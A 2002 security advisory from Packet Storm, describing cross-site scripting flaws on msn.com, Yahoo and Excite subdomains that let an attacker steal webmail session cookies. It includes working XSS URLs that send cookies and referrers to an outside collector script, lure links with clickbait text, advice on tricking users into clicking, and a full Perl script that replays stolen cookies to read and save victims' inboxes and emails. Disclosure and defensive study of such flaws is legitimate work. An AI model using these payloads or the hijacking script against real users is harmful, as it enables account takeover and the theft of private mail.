XSS-Cookie-Advisory.txt

2002-11-17T00:00:00
ID PACKETSTORM:30030
Type packetstorm
Reporter NightHawk
Modified 2002-11-17T00:00:00

Description

                                        
                                            `  
-------------------------------------------------------  
XSS/Cookie problems at major (webmail) sites Advisory  
-------------------------------------------------------  
  
XSS/Cookie problems at major (webmail) sites  
13/11/02  
- by "N|ghtHawk" Thijs Bosschert (nighthawk_at_hackers4hackers.org)  
  
----------------------  
Introduction:  
----------------------  
  
After finding a XSS/Cookie bug in the lycos.com mail site[0], I   
wondered if it was the only site with those problems. I found out   
that more sites got the same problem. This advisory gives three   
other sites to show the problem, and explains what the problem is.  
  
  
----------------------  
Vendor Information:  
----------------------  
  
Homepage : http://www.hotmail.com  
Vendor informed  
About bug : -  
Mailed advisory: 11/11/02  
Vender Response : none (yet?)  
Status : Cookie capturing still possible  
  
  
Homepage : http://www.yahoo.com  
Vendor informed  
About bug : 03/11/02  
Mailed advisory: 03/11/02  
Vender Response : none (yet?)  
Status : Cookie capturing still possible  
  
  
Homepage : http://www.excite.com  
Vendor informed  
About bug : 11/11/02  
Mailed advisory: 11/11/02  
Vender Response : 1 autoreply  
Status : Cookie capturing still possible  
  
  
----------------------  
Affected Versions:  
----------------------  
  
Tested on:  
- hotmail.com webmail  
- yahoo.com Webmail  
- excite.com webmail  
  
Not tested on:  
- Other MSN/Passport services  
- Other yahoo services   
- Other excite services  
  
  
----------------------  
Description:  
----------------------  
  
  
What is Hotmail?  
-------------  
  
- http://www.hotmail.com  
- Hotmail is the world's largest provider of free, Web-based  
e-mail. It is based on the premise that e-mail access   
should be easy and possible from any computer connected to   
the World Wide Web. Hotmail eliminates the disparities   
among e-mail programs by adhering to the universal Hypertext  
Transfer Protocol (HTTP) standard. Sending and receiving   
e-mail from Hotmail is easy: go to the Hotmail Web site at   
http://www.hotmail.com or click the Hotmail link at   
http://www.msn.com, sign in, and send an e-mail message. By   
using a Web browser as a universal e-mail program, Hotmail   
lets you stay connected anywhere in the world.   
  
  
What is Yahoo?  
-------------  
  
- http://www.yahoo.com/  
  
- "Yahoo currently provides users with access to a rich   
collection of resources, including, various communications   
tools, forums, shopping services, personalized content and   
branded programming through its network of properties (the  
"Service"). "  
  
  
- http://mail.yahoo.com  
  
- "Yahoo! Mail is one of the Internet's most popular free   
e-mail services.   
Access your e-mail account from anywhere  
With Yahoo! Mail, you have access to your email from any   
Internet-connected computer in the world. Whether you are   
at a cafe, in a library, at work or at home, with Yahoo!   
Mail, your email address is the same and your account is   
accessible from all locations. "  
  
  
What is Excite?  
-------------  
  
- http://www.excite.com  
- Excite is a multi-purpose service which allows you to use   
or access a wealth of products and services, including   
e-mail, search services, chat rooms and bulletin boards,   
shopping services, news, financial information and broad   
range of other content (collectively the "Excite Service").   
  
  
----------------------  
Vulnerability:  
----------------------  
  
All of the above named sites use cookies with their mailservices.   
Also do these sites have more than one service, and for the   
different services have different hostnames/servers.   
  
The problem in this is that with finding a XSS bug in one of the   
many services there could be made a XSS request to get the cookie   
of the mailservice.  
  
Hotmail example:  
--------------------  
  
Hotmail uses *.msn.com for there services, so with a XSS bug in   
any *.msn.com the cookie for the email service can be captured.  
The example XSS is in the 'article.asp' script on   
'www.accesshollywood.msn.com'. This script doesn't seem to be   
filtering anything, so a XSS-url will be:  
  
- http://www.accesshollywood.msn.com/news/article.asp?art=><script>  
window.open('http://host/cgi-bin/rompigema.pl?'+document.referrer  
+'%20'+document.cookie);</script>  
  
  
Yahoo example:  
--------------------  
  
The yahoo mailservice uses a *.yahoo.com server, so a XSS on any   
*.yahoo.com server will give the cookie of the mailserver.  
The example XSS is in the 'login' script on 'login.europe.yahoo.com'.   
This script seems to be filtering < and %3C. But yahoo uses the same   
script for multiple lands, and shows a picture for each land. It gets   
the name of the picture partly from a variable. So with changing the   
name of the picture in something bogus and adding an 'onerror' you   
can insert javascript into it. So a XSS-url would be:  
  
- http://login.europe.yahoo.com/config/login?.intl=frx%22%20onerror=  
%22plof:window.open('http://host/cgi-bin/rompigema.pl?'%2Bdocument.  
referrer%2B'%20'%2Bdocument.cookie)%22%3E&.src=ym&.done=  
  
  
Excite example:  
--------------------  
  
The excite mailservice uses a *.excite.com server, so any XSS on a  
*.excite.com can be used to get the mailservice cookie.   
The example XSS is in the 'spmywaymaint.jsp' script on   
'sports.excite.com'.   
The example XSS-url would be:  
  
- http://sports.excite.com/jsp/spmywaymaint.jsp?ru=X%22><script>  
window.open('http://host/cgi-bin/rompigema.pl?'%252Bdocument.  
referrer%252B'%20'%252bdocument.cookie);</script>  
  
--------------------  
  
  
One of the problems with these bugs is that the XSS-bug is on another   
server/service and probably be maintained by other people than the   
people who are maintaining the mailservice. Because of this, fixing   
the bug can take a lot more time than actually needed.   
Bugs on other services can insecure the mailservice, and because there   
are many services on those sites most of the time it may be easy to   
find another XSS-bug.  
  
  
----------------------  
Exploit:  
----------------------  
  
The XSS bugs can be exploited by letting people click a link in an email.   
Example links:  
  
HOTMAIL:  
- <a href="http://www.accesshollywood.msn.com/news/article.asp?  
art=><script>window.open('http://host/cgi-bin/rompigema.pl?'+  
document.referrer+'%20'+document.cookie);</script>">Britney   
Nude!</a>  
  
YAHOO:  
- <a href="http://login.europe.yahoo.com/config/login?.intl=  
frx%22%20onerror=%22plof:window.open('http://host/cgi-bin/  
rompigema.pl?'%2Bdocument.cookie)%22%3E&.src=ym&.done=">  
Britney Nude!</a>  
  
EXCITE:  
- <a href="http://sports.excite.com/jsp/spmywaymaint.jsp?ru=  
X%22><script>window.open('http://host/cgi-bin/rompigema.pl?'  
%252Bdocument.referrer%252B'%20'%252bdocument.cookie);  
</script>">Britney Nude!</a>  
  
The string 'Britney Nude' will trick some of the people to click   
the link. Other strings like "This email could not be shown   
because of an error, please klik _here_ to try again" will trick   
a lot more users. Because many people will click such links   
without even thinking.  
  
Other ways to exploit this are:  
- Giving people links through instant messengers.  
- Put javascript in any homepage, which will open the xss bug.  
Can be exploited for example in:   
- Not good filtered forums  
- Not good filtered guestbooks  
- Give people a url which will redirect them to the XSS bug.  
  
And people can think of other ways as well, actually it isn't   
really safe to surf on the internet with a webmail account if   
the servers aren't fully secure.  
  
All the links above are going to a perl script. This script   
(rompigema.pl) will get the cookie and the referrer of the 'victim',  
then it will make a request to the server to get the frontpage,   
inbox or an email from the 'victim'.   
  
This script is to show you how easy it is to abuse cookies from   
other people, ofcourse you also could try and put the cookie into   
your own cookie-dir in windows or something.  
  
NOTE: The Rompigema.pl script will only work when people click the   
link in an email (not with the other ways written above),   
because it uses the referrer to make it more easy to make the   
request. The script could be altered so that it can be done   
without the referrer. An example of such a script is the   
fragile.pl script written for the lycos XSS/Cookie bug.  
  
  
----------------------  
Rompigema.pl:  
----------------------  
  
#!/usr/bin/perl  
#  
# Multiple XSS/Cookie Problems  
# Proof Of Concept  
# N|ghtHawk  
# nighthawk_at_hackers4hackers.org  
  
use IO::Socket;  
  
# OPTIONS  
# 1. See Frontpage  
# 2. See Inbox  
# 3. Read An E-Mail  
# 4. Only save Cookie  
$option = "3";  
  
# PATH  
$path = "/tmp/mirrors/";  
  
$cookie = "$ENV{QUERY_STRING}\;";  
$cookie =~ s/%20/ /g;  
  
if ($cookie =~ /http:\/\/(.*mail\.(.*)\..*com)(\/[^ ]* )(.*)/) {  
$host = $1;  
$type = $2;  
$req = $3;  
$cookie = $4;  
if ($req =~ /ArdSI=(.*)&ArdSI=/) {  
$ardsi = $1;  
}  
}  
  
if (!$cookie || !$host) { &no_cookie; }  
  
%msn = (  
1 => "/cgi-bin/hmhome",  
2 => "/cgi-bin/HoTMaiL?curmbox=F000000001",  
filt => "<a *href=\"\/(cgi-bin\/getmsg\?.*)\">",  
name => "class=[^ ]*\">(.*@hotmail.com)<"  
);  
  
%yahoo = (  
1 => "/ym/Welcome?order=down&sort=date&pos=0",  
2 => "/ym/us/ShowFolder?box=Inbox&order=down&sort=date&pos=0",  
filt => "\/(ym\/ShowLetter?.*)\">",  
name => "<b>.* (.*\@yahoo.com)<\/b>"  
);  
  
%excite = (  
1 => "\/splash.php?ArdSI=$ardsi&ArdSI=$ardsi",  
2 => "\/folder_msglist.php?t=0&m=0&ArdSI=$ardsi&in=1",  
filt => "(msg_read.php?[^>]*)'",  
name => "<b>Hi (.*)!<\/b>"  
);  
  
$req = "$$type{2}";  
if ($option == "1") { $req = "$$type{1}"; }  
  
$data = request($host, $req);  
  
if ($option == "3") {  
@datar = split(/\n/,$data);  
foreach $line (@datar) {  
if ($line =~ /$$type{filt}/) {  
$req = "/$1";  
}  
}  
$data = request($host, $req);  
}  
  
&out($data);  
  
sub out {  
my ($data) = @_;  
@datar = split(/\n/,$data);  
foreach $line (@datar) {  
if ($line =~ /$$type{name}/) {  
$name = $1;  
}  
}  
if ($option == 4) {  
$data = "$name\n$cookie\n";  
$name = "cookies";  
}  
open(FILE,">>$path$name.html");  
print FILE "$data\n";  
close(FILE);  
print "Content-type: text/html\n";  
print "Location: http://www.dwheeler.com/secure-programs/".  
"Secure-Programs-HOWTO.html\n\n";  
}  
  
sub request {  
my ($host, $req) = @_;  
$sock = IO::Socket::INET->new(  
Proto => "tcp",  
PeerAddr => "$host",  
PeerPort => "80",  
Timeout => 30) || die "Could not create socket: $!\n";  
print $sock "GET $req HTTP/1.0\n".  
"Host: $host\n".  
"Accept: image/gif, image/x-xbitmap, */*\n".  
"Accept-Language: nl\n".  
"User-Agent: Pr00fOfConcept/1.0 \n".  
"Connection: Keep-Alive\n".  
"Cookie: $cookie\n\n";  
sleep(4);  
recv($sock,$data,200000,0);  
close($sock);  
return $data;  
}  
  
sub no_cookie {  
print "content-type: text/html\n\n";  
print "<h1>No Cookie or Referrer found</h1>\n";  
exit;  
}  
  
  
----------------------  
Patch:  
----------------------  
  
Well, it's up to the sites to patch this. It would be a good idea   
to not put insecure scripts on a server which uses the same   
cookies as your mailsystem.   
Also I really think an idea like HttpOnly[1] would be a good start   
in getting rid of all the XSS bugs.  
  
  
----------------------  
Links:  
----------------------  
  
[0]Lycos XSS/Cookie Advisory:  
- http://www.securiteam.com/securitynews/6R0041P60Q.html  
- http://www.dsinet.org/?id=3005  
  
XSS:  
- http://www.cgisecurity.com/articles/xss-faq.shtml  
  
[1]HttpOnly:  
- http://online.securityfocus.com/archive/1/299032/2002-10-30/2002-11-05/1  
- http://msdn.microsoft.com/library/en-us/dncode/html/secure10102002.asp  
  
Meaning of Rompigema:  
- http://wwwtios.cs.utwente.nl/traduk/EO-EN/Traduku?rompig%5Eema  
  
  
----------------------  
Thanks:  
----------------------  
  
Asby, Wim, Digiover, Scorpster, Anna  
  
  
----------------------  
  
`